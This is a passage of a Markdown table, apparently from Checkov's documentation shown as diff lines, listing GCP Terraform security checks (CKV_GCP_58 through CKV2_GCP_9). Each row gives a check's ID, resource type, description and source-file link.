[GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) | -| 2230 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) | -| 2231 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) | -| 2232 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) | -| 2233 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) | -| 2234 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) | -| 2235 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) | -| 2236 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private 
Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) | -| 2237 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) | -| 2238 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) | -| 2239 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | -| 2240 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | -| 2241 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | -| 2242 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | -| 2243 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | 
[GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) | -| 2244 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) | -| 2245 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | -| 2246 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | -| 2247 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) | -| 2248 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) | -| 2249 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) | -| 2250 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) | -| 2251 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) | -| 2252 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) | -| 2253 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | 
[CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) | -| 2254 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) | -| 2255 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) | -| 2256 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) | -| 2257 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) | -| 2258 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) | -| 2259 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | 
[BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) | -| 2260 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) | -| 2261 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) | -| 2262 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) | -| 2263 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) | -| 2264 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | -| 2265 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | -| 2266 | CKV_GCP_92 | resource | google_vertex_ai_dataset 
| Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) | -| 2267 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) | -| 2268 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) | -| 2269 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) | -| 2270 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) | -| 2271 | CKV_GCP_97 | resource | google_redis_instance | Ensure Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | -| 2272 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | 
[DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 2273 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 2274 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 2275 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 2276 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 2277 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 2278 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 2279 | CKV_GCP_101 | resource | 
google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 2280 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 2281 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 2282 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | -| 2283 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | -| 2284 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | -| 2285 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | 
[GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) | -| 2286 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2287 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2288 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2289 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2290 | CKV_GCP_108 | resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) | -| 2291 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | 
-| 2292 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) | -| 2293 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) | -| 2294 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 2295 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 2296 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 2297 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) | -| 2298 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) | -| 2299 | 
CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 2300 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 2301 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 2302 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 2303 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 2304 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. 
| Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 2305 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) | -| 2306 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) | -| 2307 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) | -| 2308 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) | -| 2309 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) | -| 2310 | CKV_GCP_123 | resource | google_container_cluster | GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) | -| 2311 | CKV_GCP_124 | resource | google_cloudfunctions2_function 
| Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | -| 2312 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | -| 2313 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) | -| 2314 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) | -| 2315 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) | -| 2316 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2317 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention 
policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2318 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2319 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2320 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 2321 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 2322 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 2323 | 
CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 2324 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 2325 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 2326 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 2327 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 2328 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | 
[GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 2329 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 2330 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 2331 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | 